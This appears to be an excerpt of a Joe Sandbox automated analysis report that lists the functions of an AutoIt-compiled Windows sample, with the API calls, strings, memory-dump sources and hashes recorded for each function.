                                                    • VariantInit.OLEAUT32(?), ref: 006C88D7
                                                    • CoInitialize.OLE32(00000000), ref: 006C8904
                                                    • CoUninitialize.OLE32 ref: 006C890E
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 006C8A0E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 006C8B3B
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006E2C0C), ref: 006C8B6F
                                                    • CoGetObject.OLE32(?,00000000,006E2C0C,?), ref: 006C8B92
                                                    • SetErrorMode.KERNEL32(00000000), ref: 006C8BA5
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006C8C25
                                                    • VariantClear.OLEAUT32(?), ref: 006C8C35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,n
                                                    • API String ID: 2395222682-1563246951
                                                    • Opcode ID: 4cbe8c0faa529bb8b0dacd88d63a52be1ac45ff84f3f3bb6b253835d58874d5b
                                                    • Instruction ID: f1cb02f380f5bcfc1d09431d3229327ce67de31c05447f31b1c6034bdae20f77
                                                    • Opcode Fuzzy Hash: 4cbe8c0faa529bb8b0dacd88d63a52be1ac45ff84f3f3bb6b253835d58874d5b
                                                    • Instruction Fuzzy Hash: C3C115B1604345AFC710DF64C884E6AB7EAFF89748F00491DF98A9B251DB71ED06CB52
                                                    Function 006D8645 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006D86FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID: @U=u$hW
                                                    • API String ID: 634782764-4076565667
                                                    • Opcode ID: 9612c4472bd6812cbaa4d95a4971ccec716e8e6b8e8f37c42fe538eff6a22926
                                                    • Instruction ID: 2cb8b270e82b451c315726ca7d9b987c5281e2ea9e3780d796a9215f8a210222
                                                    • Opcode Fuzzy Hash: 9612c4472bd6812cbaa4d95a4971ccec716e8e6b8e8f37c42fe538eff6a22926
                                                    • Instruction Fuzzy Hash: 31518030E00244BEDB249B28CC8EFAD7BA7AB05720F604157F911E73A1CB71EA80DB55
                                                    Function 006A77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _memset.LIBCMT ref: 006A786B
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006A78A0
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006A78BC
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006A78D8
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006A7902
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006A792A
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006A7935
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006A793A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 8517680788be807304cbbaf2b171957b1356bac30ed2da14ffd0c6635f9f999e
                                                    • Instruction ID: e31d7d1db35ff467c908612125681777ec81cbbf55c541a81416551c892a143e
                                                    • Opcode Fuzzy Hash: 8517680788be807304cbbaf2b171957b1356bac30ed2da14ffd0c6635f9f999e
                                                    • Instruction Fuzzy Hash: D7410A72C14229AACB11EB94EC55DEEB7BAFF04351F40412AE805A3261DA345E08CB94
                                                    Function 006D0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 82a858257dc1362a0d779a4c9aaf00291f926b83f8b6ab860bc01693b52d939e
                                                    • Instruction ID: b5112c6e8b8dee00bcd68be98f911ca5676bf3fd98584b0d82b93e349e84b431
                                                    • Opcode Fuzzy Hash: 82a858257dc1362a0d779a4c9aaf00291f926b83f8b6ab860bc01693b52d939e
                                                    • Instruction Fuzzy Hash: 26415C7190028ACBEF50EF10D856AEF37A6AF11700F64446AFC551B392DB349D1ACBA0
                                                    Function 006D7152 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006D716A
                                                    • CreateMenu.USER32 ref: 006D7185
                                                    • SetMenu.USER32(?,00000000), ref: 006D7194
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D7221
                                                    • IsMenu.USER32(?), ref: 006D7237
                                                    • CreatePopupMenu.USER32 ref: 006D7241
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D726E
                                                    • DrawMenuBar.USER32 ref: 006D7276
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F$hW
                                                    • API String ID: 176399719-2236178175
                                                    • Opcode ID: 736213308cefea8c922e89a4bbddc9cc7b0f716d2ae4b78a7b28d0f58f2039ba
                                                    • Instruction ID: ef326a0fd43d8a64fe3b120d1be5d266487beab998dfddf4cf7c7dae6522f10c
                                                    • Opcode Fuzzy Hash: 736213308cefea8c922e89a4bbddc9cc7b0f716d2ae4b78a7b28d0f58f2039ba
                                                    • Instruction Fuzzy Hash: E4415874A01205EFDB20DF64E884EDABBB6FF59310F14412AF906A7361E731AA10CF91
                                                    Function 006D74BB Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006D755E
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 006D7565
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006D7578
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006D7580
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006D758B
                                                    • DeleteDC.GDI32(00000000), ref: 006D7594
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006D759E
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006D75B2
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006D75BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: @U=u$static
                                                    • API String ID: 2559357485-3553413495
                                                    • Opcode ID: abae23ddd9fde66697034d639e9c2cb6408fadf5343f2c3afd48693819efe03a
                                                    • Instruction ID: 1571d09ad6687204866abc6cd36cfad773ce24847d9b3614be933acb8f4bb728
                                                    • Opcode Fuzzy Hash: abae23ddd9fde66697034d639e9c2cb6408fadf5343f2c3afd48693819efe03a
                                                    • Instruction Fuzzy Hash: 0D319E32905214BBDF119F64EC08FDB3B6AFF09321F114226FA16962E0DB31D821DBA5
                                                    Function 006AF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0068E2A0,00000010,?,Bad directive syntax error,006DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006AF7C2
                                                    • LoadStringW.USER32(00000000,?,0068E2A0,00000010), ref: 006AF7C9
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • _wprintf.LIBCMT ref: 006AF7FC
                                                    • __swprintf.LIBCMT ref: 006AF81E
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006AF88D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1506413516-4153970271
                                                    • Opcode ID: c0ea0fc7d67f140067448c682dd9bab421dcccdfbb298b2970c8d85b85d14abc
                                                    • Instruction ID: 8b45e9f8b695d1226e6eb6588b0c76d5e90ddaa9ec8e380dadf48bbd96ec9f2f
                                                    • Opcode Fuzzy Hash: c0ea0fc7d67f140067448c682dd9bab421dcccdfbb298b2970c8d85b85d14abc
                                                    • Instruction Fuzzy Hash: BF21B47180021EFFCF51EF90CC0AEED777ABF18301F04446AF915661A2DA759A18DB55
                                                    Function 006B52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                      • Part of subcall function 00657924: _memmove.LIBCMT ref: 006579AD
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006B5330
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006B5346
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006B5357
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006B5369
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006B537A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e378f75177439296e4a18ebbc27072e758964b68aab64456e938ad22ee78b43b
                                                    • Instruction ID: 4dd51b7dc2ccbe6cac7ed72567213fdebe7a2e2461def28dde714d1cc3f5414f
                                                    • Opcode Fuzzy Hash: e378f75177439296e4a18ebbc27072e758964b68aab64456e938ad22ee78b43b
                                                    • Instruction Fuzzy Hash: 5F11C8B0950119B9D7A0B7A1DC49DFF7BFDEB91B41F0005197802921D1EEA00D48C675
                                                    Function 006B46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: 74662cc4a68c62dc39c3bcf3284e08e668df10a7ef0586a1019b01e2903ea6d4
                                                    • Instruction ID: e8ccc615aa184d3870a5f3bc1976b133b5542475e0b0051d098e3fd04a3ca850
                                                    • Opcode Fuzzy Hash: 74662cc4a68c62dc39c3bcf3284e08e668df10a7ef0586a1019b01e2903ea6d4
                                                    • Instruction Fuzzy Hash: 0411E771904115AFDB60AB309C4AEEA77BEEF02711F0441BAF44A96192EF718AC1C765
                                                    Function 006BD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CoInitialize.OLE32(00000000), ref: 006BD5EA
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006BD67D
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 006BD691
                                                    • CoCreateInstance.OLE32(006E2D7C,00000000,00000001,00708C1C,?), ref: 006BD6DD
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006BD74C
                                                    • CoTaskMemFree.OLE32(?,?), ref: 006BD7A4
                                                    • _memset.LIBCMT ref: 006BD7E1
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 006BD81D
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006BD840
                                                    • CoTaskMemFree.OLE32(00000000), ref: 006BD847
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006BD87E
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 006BD880
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 2fa0adcf6c77712c01ecde4ce09551073817c7561ffac883c774ce8d6eabc257
                                                    • Instruction ID: cc5c5f894333c379127f540fe2159ce2f523e4e8007ae1f7b88a0319ed04af89
                                                    • Opcode Fuzzy Hash: 2fa0adcf6c77712c01ecde4ce09551073817c7561ffac883c774ce8d6eabc257
                                                    • Instruction Fuzzy Hash: 3EB1FA75A00109AFDB44DFA4C884DAEBBFAEF48305F1484A9F90ADB261DB30ED45CB54
                                                    Function 006AC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 006AC283
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC295
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006AC2F3
                                                    • GetDlgItem.USER32(?,00000002), ref: 006AC2FE
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC310
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006AC364
                                                    • GetDlgItem.USER32(?,000003E9), ref: 006AC372
                                                    • GetWindowRect.USER32(00000000,?), ref: 006AC383
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006AC3C6
                                                    • GetDlgItem.USER32(?,000003EA), ref: 006AC3D4
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006AC3F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006AC3FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 7733a91f4127e4cb35e512958f1146ffa0680889bc104b44641406c6355cf91a
                                                    • Instruction ID: 40d1df339102a9a44210a820a7a5bfb5fb5ddb308ac814473133c1f3b240b2eb
                                                    • Opcode Fuzzy Hash: 7733a91f4127e4cb35e512958f1146ffa0680889bc104b44641406c6355cf91a
                                                    • Instruction Fuzzy Hash: 56514E71B00205AFDF18DFA9DD99AAEBBBAEB88711F14812DF516D7290DB70DD008B50
                                                    Function 006DD43E Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 257windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 006DD47C
                                                    • GetSystemMetrics.USER32(0000000F), ref: 006DD49C
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006DD6D7
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006DD6F5
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006DD716
                                                    • ShowWindow.USER32(00000003,00000000), ref: 006DD735
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006DD75A
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 006DD77D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID: @U=u$hW
                                                    • API String ID: 1211466189-4076565667
                                                    • Opcode ID: d9a6a36efbd513dafecbce904c979dae87d7d4eb872c5d5dc51405e42a949977
                                                    • Instruction ID: ad20d175f7c2bf4eee33cc7c7d33bfd5a4542fceaf1e95e2bb6ac294c793a636
                                                    • Opcode Fuzzy Hash: d9a6a36efbd513dafecbce904c979dae87d7d4eb872c5d5dc51405e42a949977
                                                    • Instruction Fuzzy Hash: 96B17A75A00215EBDF14DF69C985BED7BB2BF48701F08C0AAEC499B395D734A950CB90
                                                    Function 006BA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,006DF910), ref: 006BA90B
                                                    • GetDriveTypeW.KERNEL32(00000061,007089A0,00000061), ref: 006BA9D5
                                                    • _wcscpy.LIBCMT ref: 006BA9FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: eaf86b00d19b0bc3732c5c0e4ed4f30143c7bbd381c866dd98dfe04f5579ec78
                                                    • Instruction ID: e3ce290ad470ea2cc911edee3746ee3a86592290350dda9f1926a75fef55dc18
                                                    • Opcode Fuzzy Hash: eaf86b00d19b0bc3732c5c0e4ed4f30143c7bbd381c866dd98dfe04f5579ec78
                                                    • Instruction Fuzzy Hash: 5C51AA71528301AFC350EF54C992AAFB7E7EF84700F14492DF896572A2DB319949CBA3
                                                    Function 00652B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0068C2F7
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068C319
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0068C331
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0068C34F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0068C370
                                                    • DestroyIcon.USER32(00000000), ref: 0068C37F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0068C39C
                                                    • DestroyIcon.USER32(?), ref: 0068C3AB
                                                      • Part of subcall function 006DA4AF: DeleteObject.GDI32(00000000), ref: 006DA4E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
